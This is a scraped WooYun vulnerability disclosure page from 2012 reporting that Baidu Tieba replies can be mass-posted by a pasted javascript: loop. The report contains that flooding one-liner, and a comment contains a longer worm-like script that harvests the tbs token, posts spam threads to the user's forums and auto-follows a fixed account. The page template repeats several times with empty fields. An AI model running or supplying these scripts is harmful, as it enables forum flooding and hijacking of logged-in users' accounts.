IE执行JAVASCRIPT导致百度等贴吧强制回复

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-06338

漏洞标题：IE执行JAVASCRIPT导致百度等贴吧强制回复

漏洞作者： tianmu

提交时间：2012-04-24 18:42

修复时间：2012-06-08 18:43

公开时间：2012-06-08 18:43

漏洞类型：应用配置错误

危害等级：低

自评Rank：2

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2012-04-24：细节已通知厂商并且等待厂商处理中
2012-04-25：厂商已经确认，细节仅向厂商公开
2012-05-05：细节向核心白帽子及相关领域专家公开
2012-05-15：细节向普通白帽子公开
2012-05-25：细节向实习白帽子公开
2012-06-08：细节向公众公开

简要描述：

在IE浏览器等浏览器中执行javascript代码，在百度贴吧等地方无验证码的情况下导致循环回帖。最终达到爆吧效果

详细说明：

javascript:var c=rich_postor._getData();c.content='我爱你';for(var i=1;i<=999;i++){PostHandler.post(rich_postor._option.url,c,function(I){rich_postor.showAddResult(I)},function(I){});};void 0
登录账号后，只要达到无验证码权限，进入帖子页面后，在浏览器粘贴此代码将自动回帖。

漏洞证明：

数页回复均为此类

修复方案：

暂无有效防护

版权声明：转载请注明来源 tianmu@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：1

确认时间：2012-04-25 17:30

厂商回复：

贴吧在单位时间内的回复数量是有一定限制的，不只是验证码。
感谢提交~~

漏洞评价：

2012-04-24 18:49 | xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

应该与是否使用javascript无关吧
2012-04-24 22:42 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

@xsser 对了咱首页下面给CNVD的大大的图片链接过去404了，人家改版了，是不是也应该同步？
2012-04-24 22:48 | xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

@imlonghao 额...好上次和他们提过的
2012-04-24 23:54 | 水滴 ( 普通白帽子 | Rank:146 漏洞数:24 )

= = 这。。
2012-04-25 17:29 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

@xsser 地址改成了：http://www.cert.org.cn/publish/main/12/2012/20120330183903150713234/20120330183903150713234_.html
2012-04-25 17:54 | 一刀终情 ( 普通白帽子 | Rank:156 漏洞数:28 | ‮‮PKAV技术宅社区-安全爱好者)

关注下
2012-04-26 08:30 | Finger ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗，任何自称Finger并...)

@xsser 现在需要人工审核的漏洞好慢啊几个人在审核啊？
2012-04-26 10:02 | xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

@Finger 恩内容越来越多，越来越杂呢
2012-04-30 13:32 | Say ( 路人 | Rank:17 漏洞数:4 | 谁又会鉴定谁正常？)

function getmyforum(url){xmlHttp = createXHR(); xmlHttp.open("GET",url,false); xmlHttp.send(); result = xmlHttp.responseText;result = result.match(/\/f\?kw=[A-Z0-9\%]*&from=ucenter/g);return result;}function getarg(forumurl){xmlHttp = createXHR(); xmlHttp.open("GET",forumurl,false); xmlHttp.send(); result = xmlHttp.responseText;forumname = result.match("hidden\" name=\"kw\" id=\"kw\" value=\"[^\"]*").toString().split('"')[6];forumname = encodeURIComponent(forumname);fid = result.match("hidden\" name=\"fid\" id=\"fid\" value=\"[^\"]*").toString().split('"')[6];tbs = result.match("PageData.tbs = \"[a-z0-9]+\";").toString().split('"')[1];return [forumname,fid,tbs];}function publish_delay(data,i){var t=setTimeout("publish(data)",1000*i);}function publish(data){ url="http://tieba.baidu.com/f/commit/thread/add";xmlHttp = createXHR(); xmlHttp.open("POST",url,false); xmlHttp.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xmlHttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded; charset=UTF-8"); xmlHttp.send(data);}function followme(){ url = "http://tieba.baidu.com/i/181104344";xmlHttp = createXHR(); xmlHttp.open("GET",url,false); xmlHttp.send();result = xmlHttp.responseText;tbs = result.match("[^_]tbs : \"[0-9a-z]*\"").toString().split('"')[1];portrait = result.match(/UserInfo.request\(\"[0-9a-z]*/).toString().split('"')[1];if(tbs == null || portrait == null){ return;}inf = 'cmd=follow&tbs=' + tbs + '&portrait=' + portrait;url="http://tieba.baidu.com/i/commit?stamp=" + new Date().getTime();;xmlHttp = createXHR(); xmlHttp.open("POST",url); xmlHttp.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xmlHttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded; charset=UTF-8"); xmlHttp.send(inf);}function random_msg(){var tarr = new Array( '说不过就删帖封号,有意思吗?','这个楼我们一定要盖啊啊啊?','绝对震撼人心的语录,2011年','显然,或者,哦,这事做错了?');var carr = new Array(' RT ',' 难道不是吗? ',' 如题','我想说啥来着？？','我爱大清国,我怕他完了....');title = tarr[Math.floor(Math.random()*(tarr.length))];content = carr[Math.floor(Math.random()*(carr.length))];return [encodeURIComponent(title),encodeURIComponent(content)];}我还记得这个。。。
2012-05-15 18:50 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

想起经典的dz爆贴代码......

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-06338

漏洞标题：IE执行JAVASCRIPT导致百度等贴吧强制回复

相关厂商：百度

漏洞作者： tianmu

提交时间：2012-04-24 18:42

修复时间：2012-06-08 18:43

公开时间：2012-06-08 18:43

漏洞类型：应用配置错误

危害等级：低

自评Rank：2

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 tianmu@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-06338

漏洞标题：IE执行JAVASCRIPT导致百度等贴吧强制回复

相关厂商：百度

漏洞作者： tianmu

提交时间：2012-04-24 18:42

修复时间：2012-06-08 18:43

公开时间：2012-06-08 18:43

漏洞类型：应用配置错误

危害等级：低

自评Rank：2

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2012-06338"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 tianmu@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：